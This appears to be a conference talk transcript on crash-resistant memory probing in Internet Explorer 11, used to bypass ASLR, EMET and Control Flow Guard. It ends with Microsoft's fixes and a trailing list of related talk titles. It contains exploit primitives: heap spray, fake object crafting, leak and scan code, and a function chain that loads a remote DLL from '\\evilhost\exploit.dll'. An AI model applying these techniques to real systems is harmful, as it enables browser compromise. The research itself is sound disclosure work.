Bypassing Different Defense Schemes via Crash-Resistant Probing of Address Space
1 Bypassing Different Defense Schemes via Crash-Resistant Probing of Address Space Robert Gawlik Ruhr University Bochum Horst Görtz Institute for IT-Security Bochum, Germany
2 About me
- Playing with InfoSec since 2010
- Currently in academia at Systems Security, Horst Görtz Institute / Ruhr University Bochum
- Focusing on binary analysis / attacks / defenses / static and dynamic analysis
- Little time for bug hunting and exploiting
- Fun fact: Recently discovered favorite toy: DynamoRIO
3 Agenda
- Crash-Resistance
- Crash-Resistance in IE 32-bit (CVE )
- Memory Scanning: Bypass ASLR
- Export Resolving: Bypass EMET's EAF+
- Function Chaining: Bypass Control Flow Guard & EMET's UNC library path restriction
- Crash-Tolerant Function Dispatching: Fun!
- Mitigations/Fixes
4 Crash-Resistance
5 Crash-Resistance

```c
#include <windows.h>
#include <stdio.h>

char* addr = 0;

/* Timer callback: on its first run it dereferences address 1, which is not mapped */
void CALLBACK crash(HWND hwnd, UINT msg, UINT_PTR id, DWORD time) {
    addr++;
    printf("reading %p\n", (void*)addr);
    char content = *(addr);          /* access violation here */
    printf("read done\n");
    (void)content;
}

int main() {
    MSG msg;
    SetTimer(0, 0, 1, crash);        /* set timer callback crash() */
    while (1) {                      /* dispatch crash() each ms */
        GetMessage(&msg, NULL, 0, 0);
        DispatchMessage(&msg);
    }
}
```

- Set timer callback crash()
- Dispatch crash() each ms
- crash() generates a fault on first execution
- Program should terminate abnormally
- Instead: program runs endlessly
13 Crash-Resistance

```
0:000:x86> g
(370.e4): Access violation - code c (first chance)
crash_resistance!crash+0x2d:
009b104d 8a02    mov al,byte ptr [edx]    ds:002b: =??
0:000:x86> gn
(370.e4): Access violation - code c (first chance)
crash_resistance!crash+0x2d:
009b104d 8a02    mov al,byte ptr [edx]    ds:002b: =??
0:000:x86> !exchain
[...]
0057f800: USER32!_except_handler4+0
  CRT scope 0, filter: USER32!DispatchMessageWorker
                func: USER32!DispatchMessageWorker+36895
```

gn: pass exception unhandled. The exception chain shows the SEH frame registered by USER32!DispatchMessageWorker that catches it.
15 Crash-Resistance: Behind the Scenes (Simplified)

```c
/* DispatchMessage, simplified: the timer callback runs inside an SEH frame */
DispatchMessage:
    __try {
        crash();
    } __except (filter) {      /* access violation -> filter returns 1 */
        /* execute handler, continue execution */
    }
    return;
```

- If a fault is generated, execution is transferred to the end of the loop
- Program continues running despite producing faults
19 Crash-Resistance DEMO 1
20 Crash-Resistance
Similar issues:
- Why it's not crashing? [1]
- ANI Vulnerability (CVE ) [2]
- Escaping VMware Workstation through COM1 (JPEG2000 parsing) [3]
- The Art of Leaks (exploit reliability) [4]
21 Crash-Resistance in Internet Explorer 11
22 Crash-Resistance in IE 11
A JS callback() set with setInterval() or setTimeout() in a web worker is crash-resistant:
- Start worker
- Launch timed callback() with setInterval()
- callback() may produce access violations without forcing IE into termination
  (a): if an AV is triggered in callback(), then callback() stops running and is executed anew
  (b): if callback() produces no fault, it is executed completely and then started anew
- usable as side channel
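Because the probing callback survives each access violation, the behaviour leaves a trail that a defender can look for: a burst of first-chance c0000005 exceptions on one thread whose fault addresses advance with a fixed stride (0x1000 or 0x10000 later in the talk). The Python detector below is an added example, not part of the talk; it runs that check over constructed exception-telemetry lines (record format, pids, tids and addresses are all made up here, in the spirit of what a debugger attached to the process would record).

```python
"""Flag crash-resistant address-space probing in per-thread exception records."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real telemetry): thread 0x370.e4 walks
# 64K-aligned addresses; thread 0x9a0.3c raises two ordinary, unrelated faults.
SAMPLE_LOG = """\
2015-12-08 10:21:05.001 pid=0x370 tid=0xe4 code=c0000005 first_chance=1 addr=0x00100000
2015-12-08 10:21:05.003 pid=0x370 tid=0xe4 code=c0000005 first_chance=1 addr=0x00110000
2015-12-08 10:21:05.005 pid=0x370 tid=0xe4 code=c0000005 first_chance=1 addr=0x00120000
2015-12-08 10:21:05.007 pid=0x370 tid=0xe4 code=c0000005 first_chance=1 addr=0x00130000
2015-12-08 10:21:05.010 pid=0x9a0 tid=0x3c code=c0000005 first_chance=1 addr=0x6f8a1230
2015-12-08 10:21:05.012 pid=0x370 tid=0xe4 code=c0000005 first_chance=1 addr=0x00140000
2015-12-08 10:21:05.014 pid=0x370 tid=0xe4 code=c0000005 first_chance=1 addr=0x00150000
2015-12-08 10:21:05.016 pid=0x370 tid=0xe4 code=c0000005 first_chance=1 addr=0x00160000
2015-12-08 10:21:05.018 pid=0x370 tid=0xe4 code=c0000005 first_chance=1 addr=0x00170000
2015-12-08 10:21:06.900 pid=0x9a0 tid=0x3c code=c0000005 first_chance=1 addr=0x00000000
"""

RECORD = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3}) "
    r"pid=(?P<pid>0x[0-9a-f]+) tid=(?P<tid>0x[0-9a-f]+) "
    r"code=(?P<code>[0-9a-f]{8}) first_chance=(?P<fc>[01]) addr=(?P<addr>0x[0-9a-f]+)$"
)

def parse_records(text):
    """Yield (timestamp, pid, tid, addr) for first-chance access violations only."""
    for line in text.splitlines():
        m = RECORD.match(line.strip())
        if not m or m["code"] != "c0000005" or m["fc"] != "1":
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
        yield ts, int(m["pid"], 16), int(m["tid"], 16), int(m["addr"], 16)

def dominant_stride(addrs):
    """Return (stride, share): the most common distance between consecutive faults
    and the fraction of steps that use it (1.0 for a perfectly regular scan)."""
    deltas = [b - a for a, b in zip(addrs, addrs[1:])]
    if not deltas:
        return 0, 0.0
    best = max(set(deltas), key=deltas.count)
    return best, deltas.count(best) / len(deltas)

def find_probing(text, window=timedelta(seconds=1), min_faults=6, min_share=0.8):
    """Report threads whose first-chance AVs arrive in a burst with a regular stride.

    A thread normally dies on its first unhandled AV; many of them, survived and
    spaced at page or allocation granularity, is the signature of a scan loop
    kept alive by a catch-all exception handler.
    """
    per_thread = defaultdict(list)
    for ts, pid, tid, addr in parse_records(text):
        per_thread[(pid, tid)].append((ts, addr))
    findings = []
    for (pid, tid), events in per_thread.items():
        events.sort()
        best, start = None, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:   # sliding time window
                start += 1
            burst = events[start:end + 1]
            if len(burst) < min_faults:
                continue
            stride, share = dominant_stride([a for _, a in burst])
            if stride != 0 and share >= min_share and (best is None or len(burst) > best["faults"]):
                best = {"pid": pid, "tid": tid, "faults": len(burst), "stride": stride,
                        "first": burst[0][1], "last": burst[-1][1]}
        if best:
            findings.append(best)
    return findings

if __name__ == "__main__":
    for f in find_probing(SAMPLE_LOG):
        print("pid %#x tid %#x: %d first-chance AVs, stride %#x, %#x..%#x"
              % (f["pid"], f["tid"], f["faults"], f["stride"], f["first"], f["last"]))
```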
23 Crashless Memory Scanning in Internet Explorer 11
24 Memory Scanning: The Plan
- Spray the heap
- Use a vulnerability to change a byte
- Create a type confusion and craft fake JS objects
- Utilize fake objects in a web worker with setInterval() to scan memory in a crash-resistant way
- Discover the Thread Environment Block (TEB)
- Discover DLL base addresses
- Don't control EIP yet; instead use only JS to bypass ASLR
25 Memory Scanning: Spray the heap
Alternate between Object Arrays and Integer Arrays:
- Object Arrays become aligned to 0xYYYY0000
- Integer Arrays become aligned to +f000, +f400, +f800, +fc00

```js
// Object Array:
ObjArr[0] = new String()   // saved as reference; bit 0 never set
ObjArr[1] = 4              // integer saved as 9 = (4 << 1) | 1
// Integer Array:
IntArr[0] = 4              // saved as 4
```
26 Memory Scanning: Spray the heap

```js
ObjArr[0] = 0x808f880            // saved as (0x808f880 << 1) | 1 = 0x1011f101
ObjArr[1] = new Uint32Array()    // saved as reference 0x100ff1b0
```

```
0:036> dd L0x0c
eff fc 00003bf f ff1b
0:036> dds 100ff1b0 L1
100ff1b0  c  jscript9!js::typedarray<unsigned int,0>::`vftable'
```

(in the first dump: header space, then the first element)

IntArr is aligned to 0x1011f000; 0x10 bytes are taken as header space, so the first element resides at 0x1011f010:

```js
IntArr[0] = IntArr[(0x100 - 0x10 + 4) / 4] = 0x1011f010
```

Why this odd index? (0x100 - 0x10 + 4) / 4:
- IntArr is aligned to 0x1011f000
- 0x10: occupied header space
- + 0x100: offset to 0x1011f100
- + 0x4: element offset
- / 0x4: element size
We can expect the element to reside at 0x1011f104.

```
0:036> ddp 1011f100 L2
1011f f f
```

Almost! We need to change 01 to 00; then IE will interpret ObjArr[0] as an object reference and not as a number. Additionally, we control IntArr: we could set all fields of the object referenced by ObjArr[0].

```js
IntArr[(0x100 - 0x10) / 4] = 0x1011f010
```
33 Memory Scanning: Trigger a vulnerability to change a byte
- Use a rewriting Use-After-Free [5], e.g., CVE (IE10): OR inc [eax+0x10]
- eax is attacker controlled: possible to change an arbitrary byte and continue execution in JavaScript
- Single NULL byte write to an attacker chosen address
- create a type confusion (0x1011f101 becomes 0x1011f100) => ObjArr[0] is interpreted as object
34 Memory Scanning: Creating fake JS Objects
jscript9!js::literalstring looks like:

```c
typedef struct LiteralString_ {
    /*0x0*/ VOID*  vtable_ptr;
    /*0x4*/ VOID*  type_ptr;   // points to type object
    /*0x8*/ UINT   len;
    /*0xc*/ WCHAR* buf;        // string content
} LiteralString;
```

```js
offset = (0x100 - 0x10) / 4
IntArr[0] =                          // 0x1011f010
IntArr[offset] = 0x                  // bogus vtable
IntArr[offset + 0x4] = 0x1011f010    // points to type
IntArr[offset + 0x8] = 0x2           // length
IntArr[offset + 0xc] = 0x            // address of content
```
35 Memory Scanning: Creating fake JS Objects

```js
fakestring = ObjArr[0]       // get object element located at 0x1011f100
leak = escape(fakestring)    // leak 0x4 bytes from 0x
```

- we have set 0x as vtable ptr, but escape() still works
- fakestring.substring() does not work: vtable lookup -> AV
- We can now leak already all the things!

```js
function leak(addr){
    intarr[offset + 0xc] = addr
    return to_dword(unescape(escape(objarr[0])))
}
```
36 Memory Scanning: Creating fake JS Objects
Example: leak vtable ptr and type ptr to sanitize fakestring

```js
ObjArr[1] = bla                     // create LiteralString (0x )
str_addr = leak(0x )
str_vtable_ptr = leak(str_addr)
str_type_ptr = leak(str_addr + 4)
IntArr[offset] = str_vtable_ptr     // give fakestring a real vptr!
IntArr[offset + 4] = str_type_ptr   // real type ptr!
```

- fakestring.substring() should work now :)
- We can build arbitrary JS objects if we know their structure
- We don't have a write-what-where interface yet
- Build your own Uint32Array() to RW complete memory
37 Memory Scanning: Creating fake JS Objects
Exercise: Build your own Uint32Array(). Inaccurate hint:

```c
typedef struct Uint32Array_ {
    /*0x00*/ VOID* vtable_ptr;
    /*0x04*/ VOID* type_ptr;
    /*0x08*/ INT   NULL;
    /*0x0c*/ INT   NULL;
    /*0x10*/ VOID* arraybufferobjectptr;  // can be unset
    /*0x14*/ INT   elemsize;              // 4
    /*0x18*/ INT   arraybufferoffset;
    /*0x1c*/ INT   nrelements;            // 0x7fffffff/4
    /*0x20*/ VOID* bufferptr;             // set to 0
    /*0x24*/ INT   NULL;
    /*0x28*/ INT   NULL;
    /*0x2c*/ INT   NULL;
} Uint32Array;
```
38 Memory Scanning: Crash-Resistant Scanning
Where are we now?
- We have fake String and Typed Array objects usable to read and write the address space
- arbitrary information leak
- arbitrary memory write
- Use fake objects for crash-resistant scanning
39 Memory Scanning: Crash-Resistant Scanning: Discover a Thread Environment Block

```
0:020> !teb
TEB at 7f
0:020> dt ntdll!_teb 7f /b
   +0x000 NtTib : _NT_TIB
      +0x000 ExceptionList : 0x03e0f8cc
      +0x004 StackBase     : 0x03e
      +0x008 StackLimit    : 0x03e0c
      +0x018 Self          : 0x7f
0:020> dt ntdll!_teb 7f
   +0x030 ProcessEnvironmentBlock : 0x7f15f000 _PEB
```

Heuristic: TEB == [TEB + 0x18] && [TEB + 4] > [TEB] > [TEB + 8]?
- Normally we cannot leak the TEB as no references exist to it
- The heuristic yields the TEB if we read at the right place
- Afterwards, the PEB can be resolved
41 Memory Scanning: Crash-Resistant Scanning: Discover a Thread Environment Block

```js
/* worker.js */
self.onmessage = function(){
    addr = 0x                       // start address
    id = setInterval(scan, 0)       // scan() runs crash-resistant
}

function scan(){
    addr = addr + 0x1000            // set address to probe
    maybe_teb = leak(addr)          // leak() creates implicit flow: if addr != mapped: return
    if (isteb(maybe_teb)){          // use heuristic to discover TEB
        clearInterval(id)
        /* leak stuff: PEB + LdrData */
    }
}
```
47 Memory Scanning: Crash-Resistant Scanning: Discover module base addresses directly

```js
/* worker.js */
self.onmessage = function(){
    addr = 0x                       // start address
    id = setInterval(scan, 0)       // scan() runs crash-resistant
}

function scan(){
    addr = addr + 0x10000           // address to probe (64K alignment)
    maybe_pe = leak(addr)           // get leak or return
    if (ispe(maybe_pe)){            // if leak() succeeds check for MZ and PE header
        clearInterval(id)
        /* leak stuff: name of module, size of module */
    }
}
```
53 Memory Scanning DEMO 2
54 Resolve Exports under EMET
55 Export Resolving Resolve Exports under EMET 5.2 EAF and EAF+
56 Export Resolving: Resolve Exports under EMET EAF and EAF+
- EAF: Forbid accesses to the Export Address Table based on the calling code (shellcode)
- EAF+: Block read accesses to the Export Address Table originating from certain modules
- EMET's max. security setting for IE (blacklist): mshtml.dll; flash*.ocx; jscript*.dll; vbscript.dll; vgx.dll
- Can we abuse reads originating from non-blacklisted modules using only JS (no control-flow hijacking)?
57 Export Resolving: Resolve Exports under EMET EAF and EAF+
Yes we can! Let fakestring point to the module base and set the module size:
- escape(fakestring) copies the DLL for you! escape used msvcrt!fastcopy_i (msvcrt.dll is not blacklisted)?!
- worked with large strings but in recent tests it stopped working!!!!!! (fixed?, drunk?)
- There is something better: Use the Blob!
60 Export Resolving: Resolve Exports under EMET EAF and EAF+
Yes we can! Let fakestring point to the module base and set the module size. Create a Blob of the fakestring object:

```js
blob = new Blob([fakeString], {type: "application/octet-stream"})
url = URL.createObjectURL(blob)
```

```
0:024> kp n
 # ChildEBP RetAddr
   bed               ntdll!countunicodetoutf8+0x
   bed38  774ac7fb   ntdll!rtlunicodetoutf8n+0xf4
   bed a             KERNELBASE!WideCharToMultiByte+0x269
   bedd f            MSHTML!CBlobBuilder::AppendData+0x
   bee28  72f415e1   MSHTML!CBlobBuilder::ConstructBlob+0x2c
   bee50  714e0fb6   MSHTML!CFastDOM::CBlob::DefaultEntryPoint+0x61
```

The ntdll and KERNELBASE frames doing the copy are not blacklisted by EAF.
62 Export Resolving: Resolve Exports under EMET EAF and EAF+
Yes we can! Let fakestring point to the module base and set the module size:
- Create a Blob of the fakestring object
- Use XMLHttpRequest to retrieve a string copy of the module
- Resolve exports within the string copy:

```js
PE = to_dword(dll.substring(0x3c/2, 0x3c/2 + 2))
p_exp = PE + 0x18 + 0x60
ExportDir = to_dword(dll.substring(p_exp/2, p_exp/2 + 2))
...
```
63 Export Resolving DEMO 3
64 Function Chaining
65 Function Chaining: Staying under the radar of Control Flow Guard (CFG)
- CFG protects indirect calls
- Exported functions are allowed, but not all
Control Flow Hijacking: trigger a virtual function call with a method of fakestring:

```js
IntArr[offset] = fakevtable   // bogus vtable ptr
fakestring = ObjArr[0]
fakestring.whatever()
```

```asm
push fakestring          ; Arg1: controlled content
mov  eax, [fakestring]   ; get vtable ptr
call [eax + x]           ; controlled target
```
66 Function Chaining: Staying under the radar of Control Flow Guard (CFG)
Idea:
(1) Collect export functions which have indirect calls
(2) Check if the indirect call target is a field of the first argument
(3) Check if parameters for the indirect call target are influenced by arguments
- Fields of the controlled object (first argument) get propagated to parameters before the indirect call: chain functions
- Last function in chain is the function we want to perform our operation
67 Function Chaining: Staying under the radar of Control Flow Guard (CFG)
Example function chain:

```asm
push fakestring              ; controlled content
mov  eax, [fakestring]       ; get vtable ptr
call [eax + 0x20]            ; fake virtual function (func1)

func1(fakestring):
    ...
    push [fakestring + 0x10] ; = arg3
    push [fakestring + 0x04] ; = arg2
    push fakestring          ; = arg1
    call [fakestring + 0x08] ; = func2

func2(arg1, arg2, arg3):
    ...
    push arg2                ; = [fakestring + 0x04] = CONTEXT*
    push arg3                ; = [fakestring + 0x10] = HANDLE
    call [arg1 + 0x0c]       ; = [fakestring + 0x0c] = SetThreadContext
```
68 Function Chaining: Staying under the radar of Control Flow Guard (CFG)
Use of networkx [6] and miasm2 [7] to collect suitable exports. In RtlInsertElementGenericTableFullAvl:

```
EBX = Arg1 (fakestring)
ESI = [EBX + 0x2c]
EIP = ESI                ->  EIP = [Arg1 + 0x2c]

EBX = Arg1
Param1 = EBX             ->  Param1 = Arg1

EAX = Arg3
ECX = EAX + 0x10
Param2 = ECX             ->  Param2 = Arg3 + 0x10
```

Simple Propagation Summary:
- EIP = [Arg1 + 0x2c]
- Param1 = Arg1
- Param2 = Arg3 + 0x10
75 Function Chaining: Staying under the radar of Control Flow Guard (CFG)
Load arbitrary remote DLLs under EMET: chain of five NTDLL functions (Win 8.1 only):
(1) RtlLookupElementGenericTableFullAvl
(2) RtlInsertElementGenericTableFullAvl
(3) RtlLookupElementGenericTableFull
(4) RtlTraceDatabaseFind
(5) LdrInitShimEngineDynamic
Execute callchain: two controlled parameters
LdrInitShimEngineDynamic([fakeStr + 0x8] + 0x20, [fakestr] + 0x18)
- Param1 has to be within a module's bounds
- Param2: pointer to remote DLL: \\evilhost\exploit.dll
76 Crash-Resistant Export Dispatching
77 Crash-Resistant Export Dispatching: Combining Function Chaining and Crash-Resistance
- Function chain allows dispatching exports with max. two parameters: MoveFileA(STR, STR), NtGetContextThread(HANDLE, CONTEXT), ...
- After execution of the last function in the chain an AV is thrown
- Caught when the AV happens within callback() of setInterval()!
- Possibility to subsequently execute several function chains:
  MoveFileA() + LoadLibrary(): two chains
  NtGetContextThread() + NtContinue(): two chains
  WinExec() + WinExec() + WinExec(): three chains :)
78 Crash-Resistant Export Dispatching DEMO 4
79 Crash-Resistant Export Dispatching: Executing arbitrary exports without Shellcode, ROP or JIT
(1) Get ESP with NtGetContextThread as last function in chain
(2) Prepare fake object with CONTEXT for NtContinue: set EIP to wanted exported function (e.g., system call), set ESP to free stack space
(3) Prepare free stack space: write parameters for exported function, set return address for exported function to NULL
(4) Use virtual function call to launch NtContinue on indirect call site in crash-resistant mode
(5) Read return data of system call and proceed to step (2)
TNX to Yang Yu for the NtContinue Trick [5]!
81 Mitigations
82 Mitigations: Fixes and Feedback by Microsoft
- user32 exception handling hardening feature addresses Internet Explorer 7-11 (MS15-124) [8]
- Crash-Resistant issue fixed in MS Edge (MS15-125) [9]
- Control Flow Guard is becoming more fine-grained with each Windows version: NtContinue is no valid indirect call target in Windows 10 RTM
- Code Integrity in MS Edge: block loading of arbitrary libraries; block child process creation (Windows 10 Insider Preview)
83 Q & A robert.gawlik@rub.de
84 References [1] [2] [3] [4] Art of Leaks - read version - Yoyo.pdf [5] [6] [7] [8] [9]
More informationBeyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)
Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus(MSR) and Brandon Baker (MS) Buffer Overflows and How they Occur Buffer is a contiguous segment of memory of a fixed
More informationAutodesk AutoCAD DWG-AC1021 Heap Corruption
security research Autodesk AutoCAD DWG-AC1021 Heap Corruption Mar 2013 AutoCAD is a software for computer-aided design (CAD) and technical drawing in 2D/3D, being one of the worlds leading CAD design tools.
More informationArchitecture-level Security Vulnerabilities
Architecture-level Security Vulnerabilities Björn Döbel Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The Battlefield:
More informationT Using debuggers to analyze malware. Antti Tikkanen, F-Secure Corporation
T-110.6220 Using debuggers to analyze malware Antti Tikkanen, F-Secure Corporation Agenda Debugger basics Introduction Scenarios and tools How do debuggers work? Debug API The debugging loop Underlying
More informationSYSTEM CALL IMPLEMENTATION. CS124 Operating Systems Fall , Lecture 14
SYSTEM CALL IMPLEMENTATION CS124 Operating Systems Fall 2017-2018, Lecture 14 2 User Processes and System Calls Previously stated that user applications interact with the kernel via system calls Typically
More informationCNIT 127: Exploit Development. Ch 3: Shellcode. Updated
CNIT 127: Exploit Development Ch 3: Shellcode Updated 1-30-17 Topics Protection rings Syscalls Shellcode nasm Assembler ld GNU Linker objdump to see contents of object files strace System Call Tracer Removing
More informationIs Exploitation Over? Bypassing Memory Protections in Windows 7
Is Exploitation Over? Bypassing Memory Protections in Windows 7 Alexander Sotirov alex@sotirov.net About me Exploit development since 1999 Published research into reliable exploitation techniques: Heap
More informationFunction Call Convention
Function Call Convention Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch Content Intel Architecture Memory Layout
More informationExploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it
Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it 29.11.2012 Secure Software Engineering Andreas Follner 1 Andreas Follner Graduated earlier
More informationIs stack overflow still a problem?
Morris Worm (1998) Code Red (2001) Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 31st January 2017 Memory corruption Buffer overflow remains
More informationin memory: an evolution of attacks Mathias Payer Purdue University
in memory: an evolution of attacks Mathias Payer Purdue University Images (c) MGM, WarGames, 1983 Memory attacks: an ongoing war Vulnerability classes according to CVE Memory
More informationExploits and gdb. Tutorial 5
Exploits and gdb Tutorial 5 Exploits and gdb 1. Buffer Vulnerabilities 2. Code Injection 3. Integer Attacks 4. Advanced Exploitation 5. GNU Debugger (gdb) Buffer Vulnerabilities Basic Idea Overflow or
More informationBUFFER OVERFLOW DEFENSES & COUNTERMEASURES
BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 2018 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Finding the return address (guess
More informationAbout unchecked management SMM & UEFI. Vulnerability. Patch. Conclusion. Bruno Pujos. July 16, Bruno Pujos
July 16, 2016 1/45 Whoami RE, vulnerability research LSE 2015 Sogeti since 2/45 1 2 Reverse Exploitation 3 4 3/45 Agenda 1 4/45 Agenda 1 5/45 Unified Extended FIrmware is based on EFI Specification for
More informationString Oriented Programming Exploring Format String Attacks. Mathias Payer
String Oriented Programming Exploring Format String Attacks Mathias Payer Motivation Additional protection mechanisms prevent many existing attack vectors Format string exploits are often overlooked Drawback:
More informationPlay with FILE Structure Yet Another Binary Exploitation Technique. Abstract
Play with FILE Structure Yet Another Binary Exploitation Technique An-Jie Yang (Angelboy) angelboy@chroot.org Abstract To fight against prevalent cyber threat, more mechanisms to protect operating systems
More informationLecture 09 Code reuse attacks. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017
Lecture 09 Code reuse attacks Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Last time No good reason for stack/heap/static data to be executable No good reason for code to be writable
More informationWriting your first windows exploit in less than one hour
Writing your first windows exploit in less than one hour Klaus Gebeshuber klaus.gebeshuber@fh-joanneum.at http://www.fh-joanneum.at/ims AGENDA Workshop 10.00 13.00 Memory & stack basics, function calling
More informationCSE 127: Computer Security Control Flow Hijacking. Kirill Levchenko
CSE 127: Computer Security Control Flow Hijacking Kirill Levchenko October 17, 2017 Control Flow Hijacking Defenses Avoid unsafe functions Stack canary Separate control stack Address Space Layout Randomization
More informationU23 - Binary Exploitation
U23 - Binary Exploitation Stratum Auhuur robbje@aachen.ccc.de November 21, 2016 Context OS: Linux Context OS: Linux CPU: x86 (32 bit) Context OS: Linux CPU: x86 (32 bit) Address Space Layout Randomization:
More informationSmashing the Buffer. Miroslav Štampar
Smashing the Buffer Miroslav Štampar (mstampar@zsis.hr) Summary BSidesVienna 2014, Vienna (Austria) November 22nd, 2014 2 Buffer overflow (a.k.a.) Buffer overrun An anomaly where a program, while writing
More informationCSC 591 Systems Attacks and Defenses Stack Canaries & ASLR
CSC 591 Systems Attacks and Defenses Stack Canaries & ASLR Alexandros Kapravelos akaprav@ncsu.edu How can we prevent a buffer overflow? Check bounds Programmer Language Stack canaries [...more ] Buffer
More informationCSC 405 Computer Security Stack Canaries & ASLR
CSC 405 Computer Security Stack Canaries & ASLR Alexandros Kapravelos akaprav@ncsu.edu How can we prevent a buffer overflow? Check bounds Programmer Language Stack canaries [...more ] Buffer overflow defenses
More informationProtecting Against Unexpected System Calls
Protecting Against Unexpected System Calls C. M. Linn, M. Rajagopalan, S. Baker, C. Collberg, S. K. Debray, J. H. Hartman Department of Computer Science University of Arizona Presented By: Mohamed Hassan
More informationIdentifying Memory Corruption Bugs with Compiler Instrumentations. 이병영 ( 조지아공과대학교
Identifying Memory Corruption Bugs with Compiler Instrumentations 이병영 ( 조지아공과대학교 ) blee@gatech.edu @POC2014 How to find bugs Source code auditing Fuzzing Source Code Auditing Focusing on specific vulnerability
More informationLeveraging CVE for ASLR Bypass & RCE. Gal De Leon & Nadav Markus
Leveraging CVE-2015-7547 for ASLR Bypass & RCE Gal De Leon & Nadav Markus 1 Who We Are Nadav Markus, Gal De-Leon Security researchers @ PaloAltoNetworks Vulnerability research and exploitation Reverse
More informationUniversità Ca Foscari Venezia
Stack Overflow Security 1 2018-19 Università Ca Foscari Venezia www.dais.unive.it/~focardi secgroup.dais.unive.it Introduction Buffer overflow is due to careless programming in unsafe languages like C
More informationArchitecture-level Security Vulnerabilities. Julian Stecklina
Architecture-level Security Vulnerabilities Julian Stecklina Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The
More informationCSE 227 Computer Security Spring 2010 S f o t ftware D f e enses I Ste St f e an f Sa v Sa a v g a e g
CSE 227 Computer Security Spring 2010 Software Df Defenses I Stefan Savage Kinds of defenses Eliminate violation of runtime model Better languages, code analysis Don t allow bad input Input validation
More informationNetWare Kernel Stack Overflow Exploitation.
NetWare Kernel Stack Overflow Exploitation npouvesle@tenablesecurity.com Agenda Introduction NetWare Debugger Kernel mode stager: reverse tcp Kernel mode Stages Connect back shellcode Add user Conclusion
More informationAssembly Language: Function Calls
Assembly Language: Function Calls 1 Goals of this Lecture Help you learn: Function call problems: Calling and returning Passing parameters Storing local variables Handling registers without interference
More informationSEH overwrite and its exploitability. Shuichiro Suzuki Fourteenforty Research Institute Inc. Research Engineer
SEH overwrite and its exploitability Shuichiro Suzuki Fourteenforty Research Institute Inc. Research Engineer Agenda Theme and Goal Review of SEH overwrites Protection mechanisms for SEH overwrites Bypassing
More informationWriting Exploits with MSF3.0
Writing Exploits with MSF3.0 Saumil Shah hack.lu 2007 Luxembourg, October 18 2007 Setup and Instructions VMWare Player if you don t have VMWare Workstation Copy VM Image from CD, unzip the ZIP file Administrator
More informationBuffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.
Outline Morris Worm (1998) Infamous attacks Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 23rd January 2014 Recap Simple overflow exploit
More informationCS165 Computer Security. Understanding low-level program execution Oct 1 st, 2015
CS165 Computer Security Understanding low-level program execution Oct 1 st, 2015 A computer lets you make more mistakes faster than any invention in human history - with the possible exceptions of handguns
More informationOverview REWARDS TIE HOWARD Summary CS 6V Data Structure Reverse Engineering. Zhiqiang Lin
CS 6V81-05 Data Structure Reverse Engineering Zhiqiang Lin Department of Computer Science The University of Texas at Dallas September 2 nd, 2011 Outline 1 Overview 2 REWARDS 3 TIE 4 HOWARD 5 Summary Outline
More informationBuffer Overflows Defending against arbitrary code insertion and execution
www.harmonysecurity.com info@harmonysecurity.com Buffer Overflows Defending against arbitrary code insertion and execution By Stephen Fewer Contents 1 Introduction 2 1.1 Where does the problem lie? 2 1.1.1
More informationJust-in-Time Code Reuse
Just-in-Time Code Reuse The more things change, the more they stay the same Kevin Z. Snow 1 Luca Davi 2 & A. Dmitrienko 2 C. Liebchen 2 F. Monrose 1 A.-R. Sadeghi 2 1 Department of Computer Science University
More informationBypassing Mitigations by Attacking JIT Server in Microsoft Edge
Bypassing Mitigations by Attacking JIT Server in Microsoft Edge Ivan Fratric Infiltrate 2018 About me Security researcher at Google Project Zero Previously: Google Security Team, Academia (UNIZG) Doing
More informationTriggering Deep Vulnerabilities Using Symbolic Execution
Triggering Deep Vulnerabilities Using Symbolic Execution Dan Caselden, Alex Bazhanyuk, Mathias Payer, Stephen McCamant, Dawn Song, and many other awesome researchers, coders, and reverse engineers in the
More informationPolishing Chrome for Fun and Profit
Polishing Chrome for Fun and Profit Nils & Jon 29/08/2013 Labs.mwrinfosecurity.com MWR Labs 1 Labs.mwrinfosecurity.com MWR Labs Agenda Introduction Google Chrome Pwn2Own Vulnerabilities Demo Labs.mwrinfosecurity.com
More informationAssembly Language: Function Calls" Goals of this Lecture"
Assembly Language: Function Calls" 1 Goals of this Lecture" Help you learn:" Function call problems:" Calling and returning" Passing parameters" Storing local variables" Handling registers without interference"
More informationFrom Assembly to JavaScript and Back
From Assembly to JavaScript and Back Robert Gawlik Ruhr-University Bochum August 30th 2018 Singapore About me IT Security since 2010 PostDoc Systems Security Group @ Horst Görtz Institute / Ruhr-University
More informationDocumentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
Documentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit about a generic way to exploit Linux targets written by Kingcope Introduction In May 2013 a security advisory was announced
More informationProcesses (Intro) Yannis Smaragdakis, U. Athens
Processes (Intro) Yannis Smaragdakis, U. Athens Process: CPU Virtualization Process = Program, instantiated has memory, code, current state What kind of memory do we have? registers + address space Let's
More informationBypassing SEHOP. Stéfan Le Berre Damien Cauquil
